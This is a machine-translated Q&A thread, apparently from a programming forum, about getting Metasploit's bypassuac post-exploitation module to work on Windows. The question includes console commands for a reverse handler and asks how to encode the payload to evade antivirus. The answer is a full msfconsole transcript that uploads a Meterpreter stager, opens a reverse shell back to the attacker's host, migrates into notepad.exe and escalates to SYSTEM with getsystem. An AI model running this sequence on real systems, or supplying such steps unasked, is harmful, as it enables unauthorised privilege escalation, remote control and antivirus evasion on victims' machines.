metasploit: обход привилегий в Windows - PullRequest
1 голос
/ 09 февраля 2012

post / windows / escalate / bypassuac для меня не получается

По какой-то причине я не могу заставить работать модуль postpassit bypassuac. Вот что я сделал:

  1. Открыт сеанс meterpreter на целевой машине (как пользователь NETWORKSERVICE)
  2. Поместите сессию в фоновом режиме
  3. Пытался использовать модуль после эксплуатации, как это:

    использовать post / windows / escalate / bypassuac установить сессию 1 набор LHOST 192.168.1.100 установить эксплойт LPORT 4444

  4. Порт еще не используется, поэтому должен быть в порядке.

  5. Вывод следующий:

    [-] Обработчику не удалось привязаться к 192.168.1.100:4444 [] Запущен обратный обработчик 0.0.0.0:4444 [] Запуск обработчика полезных данных ... [] Загрузка обходного исполняемого файла UAC в файловую систему ... [] Исполняемый файл Meterpreter Stager длиной 73802 байта. [] Загрузил агент в файловую систему .... [] Выполнение почтового модуля завершено

  6. Затем он возвращается к консоли и ничего не делает, никакого нового сеанса, ничего вообще.

Я проверил следующие вещи:

  1. Загрузка исполняемого файла bypassuac-x86.exe вручную в целевое устройство. Это прекрасно работало.
  2. Проверяется, не прозвенели ли звонки вируса сканера из исполняемого файла. Они не

Есть ли способ запустить исполняемый файл вручную, и кто-нибудь может объяснить мне, как это будет работать, чтобы открыть новый сеанс meterpreter с доступом уровня SYSTEM?

Или я могу как-то кодировать полезную нагрузку и использовать свой собственный шаблон, чтобы избежать всех возможностей антивируса? Я не нашел никакой опции для кодирования модулей после эксплуатации.

Заранее спасибо

Halvar

1 Ответ

0 голосов
/ 15 января 2014
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.

msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit

[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getsystem
…got system (via technique 1).
meterpreter > sysinfo
...